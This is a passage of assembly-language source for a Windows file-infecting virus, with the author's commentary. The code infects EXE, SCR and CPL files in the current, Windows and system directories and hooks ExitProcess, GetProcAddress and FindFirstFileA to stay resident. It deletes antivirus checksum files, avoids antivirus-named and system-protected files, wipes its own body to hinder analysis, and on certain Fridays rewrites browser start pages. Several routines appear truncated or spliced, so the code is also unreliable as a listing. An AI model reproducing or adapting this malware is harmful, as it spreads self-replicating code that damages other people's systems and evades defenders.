jmp @@Loop_003 ; Check next byte (now normally)
@@Next_001: dec ecx ; End of .text?
jnz @@Loop_002 ; If not, continue checking that call
jmp @@Return ; If yes, end
@@NextByte: dec ecx ; End of .text?
jnz @@Loop_001 ; If not, continue checking for calls
jmp @@Return ; If yes, end
@@Found: dec ecx ; Decrease ecx (don't decreased before)
pushad ; Save regs
push 0
push 4 ; Write 4 bytes (overwrite address reference)
lea ebx, [ebp+AddressToAddressToLastFunc]
push ebx ; Thing to write (the dword in this variable)
lea ebx, [esi-4]
push ebx ; Place to overwrite (the address in the found
; call)
call dword ptr [ebp+RVA_GetCurrentProcess]
push eax ; Write on the current process
call dword ptr [ebp+RVA_WriteProcessMemory] ; Overwrite!
popad ; Restore registers values
jmp @@Loop_001 ; Continue looking for calls to ExitProcess
@@Return: ret ; Return
ModifyExitProcess endp
;; This function is the one that we make ExitProcess to point to. Well, we
;; make that the calls to ExitProcess point here, so they aren't calls to
;; ExitProcess anymore, but here... bah, more or less :). The fact is that if
;; we patched correctly the calls to ExitProcess, this function will be called
;; when you close the application (alt-F4, or Close in its menu, etc. etc.),
;; and here we can make lots of things without being noticed by the user as
;; easily as if we make it at the beginning, because s/he closed the applica-
;; tion and the desktop was restored, seeming a complete exiting, but this
;; virus is still alive! When we arrive here, we infect ALL files, since we
;; haven't to do the things quickly (and you can think: then, why don't you
;; wait for this function to do all and make things more unnoticeable? Because
;; if ExitProcess patching fails, at least the virus has been spreaded a
;; bit ;). Before the massive infection, we complete a little overwriting rou-
;; tine and we copy it to the stack frame. After infection, we jump there, and
;; that routine will overwrite all the virus body with 0s to avoid getting a
;; clean copy of the virus when the application ends (AVers use that technique
;; quite a lot). If I made the virus without per-process residency, I could
;; make it before jumping to the restored host, but well...
LastFunction proc
pop eax
lea edi, [esp-1800h] ; Copy the routine to the stack (qui-
; te far up, to avoid overwriting)
db 0BDh ; MOV EBP,xxx
DeltaOffset4 dd 0 ; EBP=DeltaOffset
mov [ebp+ExitCode], eax
mov esp, [ebp+LastStack] ; Get the saved stack address
add esp, 0Ch ; Eliminate some things of B4
mov eax, [ebp+RVA_ExitProcess] ; Get the address to there
mov [ebp+ExitProcessAddr], eax ; Complete the instruction
mov [ebp+SetValueToEDI], edi ; Set the jumping value
lea esi, [ebp+ZeroingFunction] ; ESI=Address to function
lea eax, [ebp+Inic_Virus] ; EAX=Beginning of the virus
mov [ebp+InicAddressFor0], eax ; Complete instruction
mov ecx, offset ZeroingFunctionEnd-offset ZeroingFunction
cld ; ECX=Size of zeroing routine
rep movsb ; Copy routine
mov byte ptr [ebp+InfectAllFiles], 1 ; Now infect all fi-
; les on current, windows and system
; directories, instead of one of each four
;; SEH frame
lea eax, [ebp+@@JumpToFinish]
push eax
push dword ptr fs:[0]
mov fs:[0], esp
mov [ebp+LastStack], esp ; For SEH returning
call RuntimeInfection
@@JumpToFinish:
@@JumpToHost: db 0BDh
DeltaOffset5 dd 0 ; This is MOV EBP,DeltaOffset
mov esp, [ebp+LastStack] ; Recover ESP
pop dword ptr fs:[0] ; Restore SEH
pop eax ; Release our handle from stack
push dword ptr [ebp+ExitCode]
db 0BFh
SetValueToEDI dd 0 ; Get the address to jump to overwrite this code
jmp edi ; Jump there
LastFunction endp
ExitCode dd 0
;; This function, after being completed, is the one that we copy to the stack
;; frame to jump and overwrite the code of this virus. After overwriting it,
;; we call to ExitProcess and finish the activity
ZeroingFunction proc
mov edi, 12345678h ; EDI=Beginning address of virus
org $-4
InicAddressFor0 dd 0
xor eax, eax ; EAX=6726D43Ah :P
mov ecx, Virus_SizePOW2 / 4 ; ECX=Virtual size in dwords
rep stosd ; Overwrite!
mov eax, 12345678h ; Before, we put here the address to
org $-4 ; ExitProcess
ExitProcessAddr dd 0
; push 0 ; Push ExitProcess return value
; It's set from before!
call eax ; Return
ZeroingFunction endp
ZeroingFunctionEnd label dword
; NOTE: When I was commenting this code (now, for me :), I realized that an
; infected application always will return 0 as errorlevel when ExitProcess,
; because I push a 0 before calling ExitProcess. The correct way of doing this
; would be get the value from stack and push it now, since it comes from a
; call to ExitProcess that we patched. I realized of this "bug" after sending
; the final version to AVers, so I didn't correct it on this source. Now it's
; corrected.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; PAYLOAD ;;
;; ;;
;; On the first and third Friday of the month, the start pages of Netscape ;;
;; and Internet Explorer are changed to "http://www.thehungersite.com". ;;
;; The first really useful payload in the viruscene history! (Well, I dunno ;;
;; if it is the first, but I like to think it :) ;;
;; ;;
;; It's not as easy as it could seem! ;;
;; Internet Explorer --> We modify the registry entry where the start page ;;
;; is especified ;;
;; Netscape --> We get the directories of all the users via the registry ;;
;; and add a line to the file PREFS.JS setting a new start ;;
;; page ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Payload proc
lea eax, [ebp+SystemTime]
push eax
call dword ptr [ebp+RVA_GetSystemTime] ; Get date and time
cmp word ptr [ebp+DayOfWeek], 5 ; Friday?
jnz @@EndOfPayload ; If not, end
cmp word ptr [ebp+Day], 7 ; First week of the month?
jbe @@DoPayload ; If not, end
cmp word ptr [ebp+Day], 14 ; Second week discarded
jbe @@EndOfPayload
cmp word ptr [ebp+Day], 21 ; Third week of the month?
ja @@EndOfPayload ; If not, end
@@DoPayload:
; We load ADVAPI32.DLL. It's normally loaded, but in this way we'll get
; the module handle, and just in case if it's not loaded.
call LoadRegistryFunctions
or eax, eax
jz @@EndOfPayload
HandleADVAPI32 dd 0
org HandleADVAPI32
HandleOpenedKey dd 0
RVA_RegistryFunctions label dword
RVA_RegOpenKeyExA dd 0
RVA_RegCloseKey dd 0
RVA_RegSetValueExA dd 0
RVA_RegEnumKeyA dd 0
RVA_RegQueryValueExA dd 0
RVA_RegEnumValueA dd 0
;; This function modifies the start page of Internet Explorer. The easiest
;; one, not as much as complicated to get as the Netscape one.
ModifyInternetExplorer proc
lea eax, [ebp+HandleOpenedKey]
push eax
push KEY_ALL_ACCESS
push 0
lea eax, [ebp+IExplorerKey]
push eax
push HKEY_CURRENT_USER
call dword ptr [ebp+RVA_RegOpenKeyExA]
; This just opened:
; HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
or eax, eax ; Error?
jnz @@End ; End if error
;; This is the path into the registry to set the page to. I don't think this
;; key will change in the future, since many programs use it to set its own
;; start page.
IExplorerKey db 'Software\Microsoft\Internet Explorer\Main',0
IExplorerValue db 'Start Page',0
;; The difficult one. Well, it's not difficult when you see it made, but it's
;; complicated to get. Since there isn't any registry key to set the start
;; page, I had to search the autoconfig (PREFS.JS) and invent a manner of
;; modifying it without many problems. I tried to map that file and move the
;; whole text after the java function that sets the start page, to make a hole
;; big enough to set the function (if the old start page were bigger, you can
;; fill with spaces), but that was a pain in the ass. Then, after a good men-
;; tal exercise :), I tried the trick I use now. Since the file is a java file
;; setting values, if you add a line at the end setting a new value, you over-
;; write the last value. It's like doing MOV AX,1234 and later MOV AX,2345 (or
;; the C equivalent).
ModifyNetscapeNavigator proc
; This variable is used for RegEnumKeyA
mov dword ptr [ebp+SubkeyIndex], 0
@@LoopOpeningSubkeys:
mov byte ptr [ebp+NetscapeKeyEnd-1], 0 ; Put this to 0
lea eax, [ebp+HandleOpenedKey]
push eax
push KEY_ALL_ACCESS
push 0
lea eax, [ebp+NetscapeKey]
push eax
push HKEY_LOCAL_MACHINE
call dword ptr [ebp+RVA_RegOpenKeyExA]
; Here, we opened the key:
; HKEY_LOCAL_MACHINE\Software\Netscape\Netscape Navigator\Users'
; We get the subkeys in the recently opened key. That are the users
; registered on the Netscape Navigator. It's like making FindFirstFile
; and FindNextFile in a directory, but easier, since we use an index
; to get the relative key.
push 80h
lea eax, [ebp+ReceivingBuffer]
push eax
push dword ptr [ebp+SubkeyIndex]
push dword ptr [ebp+HandleOpenedKey]
call dword ptr [ebp+RVA_RegEnumKeyA]
or eax, eax ; Error getting subkey?
jnz @@EndOfKeys ; If error, exit
SubkeyIndex dd 0
LongBuffer dd 0
LongBuffer2 dd 0
LineToAddToPrefs db 'user_pref("browser.startup.homepage",
"http://www.thehungersite.com");',0dh,0ah
SizeLineToAdd equ $ - offset LineToAddToPrefs
NetscapePrefsFile db '\prefs.js',0
SizeNamePrefs equ $ - offset NetscapePrefsFile
push 0
push 0
push 3
push 0
push 0
push 0c0000000h
lea eax, [ebp+ReceivingBuffer]
push eax
call dword ptr [ebp+RVA_CreateFileA] ; Open PREFS.JS
inc eax
jz @@End ; If error, exit
dec eax
mov [ebp+FileHandle], eax
push 2 ;Relative pointer position (same as INT 21h/AH=42h!)
push 0
push 0
push eax
call dword ptr [ebp+RVA_SetFilePointer] ; Put the file
; pointer at the end
inc eax
jz @@Close ; If error, exit
dec eax
push 0
lea eax, [ebp+LongBuffer]
push eax
push SizeLineToAdd
lea eax, [ebp+LineToAddToPrefs]
push eax
push dword ptr [ebp+FileHandle]
call dword ptr [ebp+RVA_WriteFile] ; Write the line at the
; end of the file
@@Close: push dword ptr [ebp+FileHandle]
call dword ptr [ebp+RVA_CloseHandle] ; Close file hangle
@@End: ret ; Return
ModifyPrefs endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
;; PER-PROCESS RESIDENCY: SETTING AND INFECTION
;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ImageBase dd 400000h
PatchImportDirectory proc
db 0B8h ; MOV EAX,xxxxxxxx
ImageBase2 dd 400000h ; Image base, set on infection time
mov ebx, [eax+3Ch]
add ebx, eax
cmp word ptr [ebx], 'EP' ; Check if PE header
jnz @@End ; If not, end
mov ecx, [ebx+84h] ; ECX=Size of import data
mov ebx, [ebx+80h]
add ebx, eax ; EBX=RVA of import directory header
@@SearchModule: mov esi, [ebx+0Ch]
or esi, esi
jz @@End
add esi, eax ; ESI=RVA to the module name
@@ToLowerCase: mov edx, [esi] ; Get the first four characters
call ToLower
cmp edx, 'nrek' ; Is it 'kern'?
jnz @@NextModule ; If not, it's not kernel32
mov edx, [esi+4] ; Get next 4 chars
call ToLower
cmp edx, '23le' ; 'el32'?
jz @@Found ; If it is, we've found KERNEL32
@@NextModule: add ebx, 14h ; Next module in import directory
sub ecx, 14h ; Have we finished?
jnz @@SearchModule ; If not, scan next module
jmp @@End ; Finish if we arrived to the end
@@Found: mov esi, [ebx+10h] ; Get the RVA to the array of imported
add esi, eax ; functions in ESI
cld
pushad
mov dword ptr [ebp+DwordToWrite], eax
push 0
push 4
lea eax, [ebp+DwordToWrite]
push eax
lea eax, [esi-4]
push eax
call dword ptr [ebp+RVA_GetCurrentProcess]
push eax
call dword ptr [ebp+RVA_WriteProcessMemory]
; mov [esi-4], eax
jmp @@Loop_001 ; Next function in the import array
@@End: ret
PatchImportDirectory endp
DwordToWrite dd 0
;,,,,,,,,,,,,,,,,,,,,,,,,,
;; PER-PROCESS FUNCTIONS ;
;'''''''''''''''''''''''''
GetDelta proc
mov eax, 12345678h ; This is set on run-time, at the
org $-4 ; beginning. It's shorter than making
DeltaOffset2 dd 0 ; a CALL/POP/SUB in every function
ret
GetDelta endp
; GetProcAddress: Patching this we ensure that the host receives our function
; address rather than the KERNEL32 one. In this way, if
; GetProcAddress is used over one of the patched functions to
; call that address directly, it'll call our function first.
My_GetProcAddress proc
call GetDelta ; EAX=Delta offset
push ecx ; Save ECX
add eax, offset @@ReturnHere ; Calculate return
; address
mov ecx, eax ; Put it on ECX...
xchg eax, [esp+4] ; ...and substitute the return
; into the stack by ours.
mov [ecx+1], eax ; Save the real return address
; in [ReturnGetProcAddress]
pop ecx ; Restore ECX
call GetDelta ; Get delta in EAX...
mov eax, [eax+RVA_GetProcAddress] ; and jump to
jmp eax ; GetProcAddress, but return...
; ...here!
@@ReturnHere: db 68h
ReturnGetProcAddress dd 0 ; Push return to host (set before)
or eax, eax ; EAX=0?
jz @@Return ; Error, so return
pushad ; Save all
push eax ; Save function address
call GetDelta
xchg ebp, eax ; EBP=Delta offset
pop eax ; Restore function address
lea esi, [ebp+RVA_GetProcAddress]
; ESI=Begin address of functions
lea edi, [ebp+RVA_GetProcAddress+10h*4]
; EDI=End address of functions
mov ebx, esi
xchg ecx, eax
@@Loop_GPA: lodsd ; Load first RVA
cmp eax, ecx ; Compare the kernel returned RVA
; with the RVA that we got scanning
; the kernel at first
jnz @@Next_GPA ; If it isn't equal, jump
sub esi, ebx ; Put in ESI the address of the per-
add esi, ebp ; process function
mov eax, [esi+FunctionsAddress+4] ; Load it
mov [esp+1Ch], eax ; Substitute RVA to function
; by our function address
jmp @@Return2 ; End
@@Next_GPA: cmp esi, edi ; Already at the end of the array?
jnz @@Loop_GPA ; If not, loop
@@Return2: popad ; Restore registers
@@Return: ret ;Return to host with the substituted RVA (if done)
My_GetProcAddress endp
InfectByPerProcess proc
push eax ; Save RVA to function
pushad
call GetDelta
xchg ebp, eax ; EBP=Delta offset
mov ebx, [esp+28h] ; EBX=RVA to the name of the
; file to operate
InfectThisPath: lea eax, [ebp+FindFileField] ; EAX=RVA to data
; storage
push eax ; Store it to use FindFirstFile
push ebx ; Store the RVA to the name of the file
call dword ptr [ebp+RVA_FindFirstFileA] ; Find it
inc eax
jz @@Return ; If error (not found), return
dec eax
mov esi, ebx
lea edi, [ebp+FileName]
cld
@@LoopCopy:
movsb
cmp byte ptr [edi-1], 0
jnz @@LoopCopy
InfectDirectly proc
pushad
jmp InfectThisPath
InfectDirectly endp
My_FindFirstFileA proc
call GetDelta ; EAX=Delta offset
mov byte ptr [eax+FindFirstIdent], 1
Common_FindFile: add eax, offset @@ReturnHere ; EAX=Return address
; for calling the KERNEL32 function
; and returning here and not to the
; host
push ecx ; Save ECX
mov ecx, eax ; ECX=Return address
xchg eax, [esp+4] ; Set it onto stack and EAX is
; now the return address to the
; host
mov [ecx+1], eax ; Save it in @@ReturnHere+1
mov eax, [esp+0Ch] ; We put the buffer address...
mov [ecx+0Dh], eax ; ...here
pop ecx ; We restore ECX
call GetDelta ; EAX = Delta offset
cmp byte ptr [eax+FindFirstIdent], 1
jz @@PutFindFirst ; If =1, call to FindFirstFileA
@@PutFindNext: mov eax, [eax+RVA_FindNextFileA]
jmp eax ; Call FindNextFileA
@@PutFindFirst: mov eax, [eax+RVA_FindFirstFileA]
jmp eax ; Call FindFirstFileA
@@ReturnHere: db 68h ; PUSH Value
dd 0 ; +1
pushad ; +5 ; Save registers
inc eax ; +6 ; Error?
jnz @@ItsOK ; +7 ; If not, jump
dec eax ; +9 ; Restore EAX
jmp @@Return ; +A ; Return to host
@@ItsOK: db 0BEh ; MOV ESI,Value ; +C ; ESI=Address to
@@ESIValue: dd 0 ; +D ; data field
call GetDelta
xchg ebp, eax ; EBP=Delta offset
lea edi, [ebp+FindFileField] ; EDI=Our data field
mov ecx, FindFileFieldSize ; Copy the data retrie-
cld ; ved by the function to our
rep movsb ; data field
dec byte ptr [ebp+InfectFileNow] ; Decrease infec-
; tion counter
jnz @@Return ; If it's not 0, don't infect
mov byte ptr [ebp+InfectFileNow], 3 ; Set this to
; 3, to infect only one of
; every three files listed by
; this function
call InfectFile ; Infect file
@@Return: popad
ret ; Restore regs and return
My_FindFirstFileA endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; RUN-TIME INFECTION
;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; This will infect one file of each four in the current, windows and system
;; directory (as always). If the files AVP.CRC, ANTI-VIR.DAT, CHKLIST.MS or
;; IVB.NTZ are found, they'll be deleted.
RuntimeInfection proc
call LoadSFCFunctions ; Load SFC.DLL library
call LoadIMAGEHLPFunctions ; Load IMAGEHLP.DLL library
call LoadRegistryFunctions
or eax, eax
jz @@NoRegistry
;;; Infectar directamente varios paths
;;; de programas instalados
; HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\
; \WinZip
; HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
mov dword ptr [ebp+SubkeyIndex], 0
@@NextSubkey:
inc dword ptr [ebp+SubkeyIndex]
jmp @@LoopSubkeys
@@EndOfKeys2:
push dword ptr [ebp+HandleOpenedKey]
call dword ptr [ebp+RVA_RegCloseKey]
@@EndOfKeys:
push dword ptr [ebp+HandleADVAPI32]
call dword ptr [ebp+RVA_FreeLibrary]
@@NoRegistry:
call InfectCurrentDir ; Self-explanatory ;)
lea eax, [ebp+Directory2]
push eax
push 80h
call dword ptr [ebp+RVA_GetCurrentDirectoryA] ; Save the
; current directory
call InfectWindowsDir ; Infect the Win dir
call InfectSystemDir ; Infect windows\system dir
lea eax, [ebp+Directory2] ; Restore the current dir
push eax
call dword ptr [ebp+RVA_SetCurrentDirectoryA]
cmp dword ptr [ebp+HandleSFC], 0
jz @@Next1
push dword ptr [ebp+HandleSFC]
call dword ptr [ebp+RVA_FreeLibrary]
@@Next1:
cmp dword ptr [ebp+HandleIMAGEHLP], 0
jz @@Next2
push dword ptr [ebp+HandleIMAGEHLP]
call dword ptr [ebp+RVA_FreeLibrary]
@@Next2:
xor eax, eax
mov dword ptr [ebp+HandleSFC], eax
mov dword ptr [ebp+HandleIMAGEHLP], eax
mov dword ptr [ebp+RVA_CheckSumMappedFile], eax
mov dword ptr [ebp+RVA_SfcIsFileProtected], eax
ret ; Return
RuntimeInfection endp
RunKey db 'Software\Microsoft\Windows\CurrentVersion\Run\'
RunKeyEnd label byte
Directory1 db 80h dup (0) ; Place to get the windows, etc. dirs
Directory2 db 80h dup (0) ; Place to save the current directory
LoadRegistryFunctions proc
lea eax, [ebp+RegistryDLL]
push eax
call dword ptr [ebp+RVA_LoadLibraryA]
or eax, eax ; Error?
jz @@Return ; Exit, then
mov [ebp+HandleADVAPI32], eax ; Save handle
lea esi, [ebp+ASC_RegistryFunctions] ; Names of functions
lea edi, [ebp+RVA_RegistryFunctions] ; Storage of RVAs
@@NextRVA: push esi
push edi
push esi
push dword ptr [ebp+HandleADVAPI32]
call dword ptr [ebp+RVA_GetProcAddress] ; Get the address
or eax, eax ; Error?
jz @@Return ; Exit, then
pop edi
pop esi
mov dword ptr [edi], eax ; Save RVA
add edi, 4
@@LoopNextFunc:
inc esi ; Next char
cmp byte ptr [esi], 0 ; End of name?
jnz @@LoopNextFunc ; If not, continue increasing
inc esi ; Jump over the 0
cmp byte ptr [esi], 0 ; Another 0?
jnz @@NextRVA ; If not, continue getting names
mov eax, 1
@@Return: ret
LoadRegistryFunctions endp
InfectSystemDir proc
mov ebx, [ebp+RVA_GetSystemDirectoryA]
Common_InfectDir: ; EBX=RVA of GetSystemDirectory
push 80h
lea eax, [ebp+Directory1]
push eax
call ebx ; GetSystemDirectory or GetWindowsDirectory
or eax, eax ; If error, end
jz @@Return
call SetDirectory1 ; Set that directory
call InfectCurrentDir ; Infect the directory files
@@Return: ret ; Return
InfectSystemDir endp
InfectWindowsDir proc
mov ebx, [ebp+RVA_GetWindowsDirectoryA]
jmp Common_InfectDir ; EBX=RVA of GetWindowsDirectory
InfectWindowsDir endp ; Jump to the common part of this
; function and the InfectSystemDir
SetDirectory1 proc
lea eax, [ebp+Directory1] ; Set the directory on this
push eax ; address (windows or system)
call dword ptr [ebp+RVA_SetCurrentDirectoryA]
ret ; Return
SetDirectory1 endp
InfectCurrentDir proc
call DeleteDATs ; Delete some antivirus CRC protections
lea ecx, [ebp+FindFileMask1] ; ECX=RVA to *.EXE
call InfectCurrentDir2 ; Infect EXEs
lea ecx, [ebp+FindFileMask2] ; ECX=RVA to *.SCR
call InfectCurrentDir2 ; Infect SCRs
lea ecx, [ebp+FindFileMask3] ; ECX=RVA to *.CPL
call InfectCurrentDir2 ; Infect CPLs
ret ; Return
InfectCurrentDir endp
InfectCurrentDir2 proc
call Random ; Get a random counter to begin infection
and al, 3
mov [ebp+FileInfectionCounter], al
lea ebx, [ebp+FindFileField]
push ebx
push ecx
call dword ptr [ebp+RVA_FindFirstFileA] ; Find first file
inc eax ; Error?
jz @@Fin0 ; Then, jump
dec eax
mov dword ptr [ebp+FindFileHandle], eax ; Save handle
@@InfectAgain: cmp byte ptr [ebp+InfectAllFiles], 1 ;For infect all files
jz @@InfectAll ; instead of one of each four
dec byte ptr [ebp+FileInfectionCounter] ; Counter in -1?
jns @@DontInfect ; If not, don't infect
mov byte ptr [ebp+FileInfectionCounter], 3 ;Set count to 3
@@InfectAll: call InfectFile ; Infect the found file
@@DontInfect: lea ebx, [ebp+FindFileField] ; Get next file
push ebx
push dword ptr [ebp+FindFileHandle]
call dword ptr [ebp+RVA_FindNextFileA]
or eax, eax ; If no error or more files, jump and
jnz @@InfectAgain ; continue infection
push dword ptr [ebp+FindFileHandle] ; Close handle
call dword ptr [ebp+RVA_FindClose]
@@Fin0: ret ; Return
InfectCurrentDir2 endp
FindFileHandle dd 0
FileInfectionCounter db 0
;; InfectFile
;;------------
;; This function uses the data in FindFileField to infect the file that repre-
;; sents, so that's why in some parts of the virus I copy the data about the
;; file in that field before calling this.
InfectFile proc
cmp dword ptr [ebp+FileSizeLow], 00002004h
jb @@End
lea ebx, [ebp+FileName] ; EBX=RVA to the file name
; This function checks if the file name begins with TB (ThunderByte),
; SC (Scan and similars, usually McCaf‚), F- (F-Potatoe), PA (Panda
; Antivirus), DR (DrWeb) or NO (Nod-Ice), or it has a V in its name
; (many antivirus programs have it: AVP, INVIRCIBLE, CPAV, etc.)
call CheckFileName
jc @@End ; Carry Flag means that is a "forbidden" name,
; so we exit if CF is set
cmp dword ptr [ebp+RVA_SfcIsFileProtected], 0 ; Could be
; SFC.DLL loaded?
jz @@NoWin2000 ; If not, we're not in Win2000
push ebx
push 0 ; Check file against Win2K protection
call dword ptr [ebp+RVA_SfcIsFileProtected]
or eax, eax ; If 0, it isn't protected
jnz @@End ; If not 0, it's protected, so don't infect
@@NoWin2000:
push 80h ; Clear file attributes (remove a posible
lea ebx, [ebp+FileName] ; read-only attribute). I haven't
push ebx ; to save the old attributes coz they are
call dword ptr [ebp+RVA_SetFileAttributesA] ; saved in the
; FindFileField structure
call OpenFile ; Open file
jc @@End2 ; CF=We couldn't, so exit
call SaveDateTime ;Save date and time stamp. It's saved in
;the FindFileField structure, but I dunno
;why when I used that data the timestamp
;weren't restored correctly, and it was
;when I used this, so I use it.
call MapFile ; Open a mapping over the file
jc @@End3 ; If we couldn't, exit
; After this, the mapping address is stored in EAX and
; [MappingAddress]
mov edi, eax ; EDI=Mapping address
cmp word ptr [edi], 'ZM' ; Has the file executable struct?
jnz @@End4 ; If not, exit
mov esi, [edi+3Ch] ; Get PE header address
cmp esi, 2000h
ja @@End4 ; Maybe compressed DOS-EXE
add esi, edi
cmp word ptr [esi], 'EP' ; Is there a PE header?
jnz @@End4 ; If not, exit
@@Loop_001: cmp dword ptr [eax], 'xet.' ; Does it begin like .text?
jnz @@LookForReloc ; If not, do next check
cmp dword ptr [eax+4], 0+'t' ; .text?
jnz @@NextSection ; If not, look next section
mov byte ptr [ebp+SectionNames+0], 1
sub eax, edi
mov [ebp+TextHeader], eax ; Physical address of .text
add eax, edi ; Restore address
jmp @@NextSection2 ; Look next section
@@LookForReloc: cmp dword ptr [eax], 'ler.' ; Does it begin like .reloc?
jnz @@LookForBss ; If not, do next check
cmp dword ptr [eax+4], 0+'co' ; .reloc?
jnz @@NextSection ; If not, look next section
sub eax, edi
mov [ebp+RelocHeader], eax ; Physical address of .reloc
add eax, edi
jmp @@NextSection2 ; Look next section
@@LookForBss: cmp dword ptr [eax], 'ssb.' ; Does it begin like .bss?
jnz @@LookForIdata ; If not, do next check
cmp dword ptr [eax+4], 0 ; .bss?
jnz @@NextSection ; If not, look next section
mov byte ptr [ebp+SectionNames+1], 1
push eax
mov eax, [eax+0Ch] ; Save the RVA of the section for
add eax, [esi+34h] ; later use in the poly engine.
mov [ebp+BssSection], eax
pop eax
jmp @@NextSection2 ; Look next section
@@LookForIdata: cmp dword ptr [eax], 'adi.' ; Does it begin like .idata?
jnz @@NextSection ; If not, do next check
cmp dword ptr [eax+4], 0+'at' ; .idata?
jnz @@NextSection ; If not, look next section
or byte ptr [eax+24h+3], 80h ;make it writable (Win98 SE)
; jmp @@NextSection ; If not, per-process fails
@@NextSection: pushad
mov edi, eax
xor edx, edx
lea esi, [ebp+SZSectionNames]
@@LoopNS_001:
push edi
push esi
xor ecx, ecx
@@LoopNS_002:
cmpsb
jnz @@NextNS_001
inc ecx
cmp ecx, 8
jnz @@LoopNS_002
mov byte ptr [ebp+edx+SectionNames], 1
pop esi
pop edi
jmp @@NextNS_002
@@NextNS_001:
pop esi
pop edi
add esi, 8
inc edx
cmp byte ptr [esi], 0
jnz @@LoopNS_001
@@NextNS_002:
popad
; mov byte ptr [ecx], '.' ; Set the '.' of the name
mov dword ptr [ecx+08h], Virus_SizePOW2 ; The virtual size
; will be the required
mov eax, [ebx+08h] ; The physical address of the section
xor edx, edx ; will be the physical address of the
push ecx ; (before) last section plus its vir-
mov ecx, [esi+38h] ; tual size rounded to the section
div ecx ; physical alignment.
inc eax
mul ecx
pop ecx
add eax, [ebx+0Ch]
mov dword ptr [ecx+0Ch], eax ; Set that address
mov dword ptr [ecx+10h], 0 ; Set its physical size to
; 0 to force its readjustement
mov eax, [ebx+14h] ; The RVA of the new section will be
add eax, [ebx+10h] ; the RVA of the last plus its vir-
mov dword ptr [ecx+14h], eax ; tual size.
mov dword ptr [ecx+24h], 0A0000020h ; READABLE/WRITABLE/
; /EXECUTABLE
sub ecx, edi ; Get the mapping address of this
; section
mov [ebp+RelocHeader], ecx ; Save it here
inc word ptr [esi+06h] ;Increase the number of sections
@@ContinueWithReloc:
mov eax, [esi+28h] ; Get the initial RVA of the EXE
mov ebx, [esi+34h]
add eax, ebx ; Add the base address...
mov [ebp+InicIP], eax ; ...and save it
mov [ebp+ImageBase], ebx ; Save the base address, too
call ConstructNameForReloc
push edi
xchg edi, eax ; EAX=Mapping address
mov edi, [ebp+RelocHeader]
add edi, eax
mov edi, [edi+14h] ; EDI=Physical address of the last
add edi, eax ; section inside the executable, now
; mapped
call CalculateAPIsAddresses
push eax
call Random ; EAX=Random value, and one of the values
mov dword ptr [ebp+CryptValue2], eax ; the virus will be
; crypted with
; int 3
call Tuareg ; Call this amazing engine! :)
Sav_NumberOfSections dw 0
ConstructNameForReloc proc
pushad
@@Loop01: call Random
and eax, 3Fh
cmp eax, 2Fh
ja @@Loop01
cmp byte ptr [ebp+eax+SectionNames], 1
jz @@Loop01
shl eax, 3
mov ecx, [ebp+RelocHeader]
add ecx, [ebp+MappingAddress]
mov ebx, dword ptr [ebp+eax+SZSectionNames]
mov [ecx], ebx
mov ebx, dword ptr [ebp+eax+SZSectionNames+4]
mov [ecx+4], ebx
popad
ret ; Return
ConstructNameForReloc endp
;; Oh, I know this function is only called once, but the code is more struc-
;; tured with this and more clear to me. Moreover, if I want to put more than
;; one calls to this function in the future... hey, I'll have it coded already
;; :)
OpenFile proc
push 0
push 0
push 3
push 0
push 0 ; ??? (I don't remember exactly why this
push 0c0000000h ; values and no others :)
push ebx ; EBX=RVA to the file name (in FindFileField)
call dword ptr [ebp+RVA_CreateFileA] ; Open the file
inc eax
jz @@Error ; If error, return carry flag
dec eax
mov dword ptr [ebp+FileHandle], eax ; Save handle...
clc ; ...clear carry flag...
ret ; ...and return
@@Error: stc
ret
OpenFile endp
MappingHandle dd 0 ; Variables
MappingAddress dd 0
FileHandle dd 0
FileDAT1 db 'AVP.CRC',0
FileDAT2 db 'ANTI-VIR.DAT',0
FileDAT3 db 'CHKLIST.MS',0
FileDAT4 db 'IVB.NTZ',0
;; If we are in Win2K, some files are protected by the operating system. Since
;; they aren't all the files in the harddisk (only the system ones), we only
;; have to check if a file is protected or not. For that thing that I do in
;; InfectFile, we need to load SFC.DLL, which have the protection APIs. If we
;; can't load that, then we aren't in Win2K, so we put 0 in the RVA-storage
;; variable to know that the function can't be called. Normally, under Win2K
;; this DLL is loaded always (like ADVAPI32.DLL), so we'll get the module
;; handle as if we call GetModuleHandleA. If not, then we load it :)
LoadSFCFunctions proc
lea eax, [ebp+SFC_Dll]
push eax
call dword ptr [ebp+RVA_LoadLibraryA]
mov dword ptr [ebp+HandleSFC], eax
or eax, eax
jz @@EndOfSFCs
lea ebx, [ebp+ASC_SfcIsFileProtected]
push ebx
push eax
call dword ptr [ebp+RVA_GetProcAddress]
@@EndOfSFCs:
mov dword ptr [ebp+RVA_SfcIsFileProtected], eax ; 0 or
ret ; address
LoadSFCFunctions endp
SFC_Dll db 'SFC.DLL',0
HandleSFC dd 0
ASC_SfcIsFileProtected db 'SfcIsFileProtected',0 ; The only function we
RVA_SfcIsFileProtected dd 0 ; need
LoadIMAGEHLPFunctions proc
lea eax, [ebp+IMAGEHLP_Dll]
push eax
call dword ptr [ebp+RVA_LoadLibraryA]
mov dword ptr [ebp+HandleIMAGEHLP], eax
or eax, eax
jz @@EndOfIMAGEHLPs
lea ebx, [ebp+ASC_CheckSumMappedFile]
push ebx
push eax
call dword ptr [ebp+RVA_GetProcAddress]
@@EndOfIMAGEHLPs:
mov dword ptr [ebp+RVA_CheckSumMappedFile], eax
ret
LoadIMAGEHLPFunctions endp
IMAGEHLP_Dll db 'IMAGEHLP.DLL',0
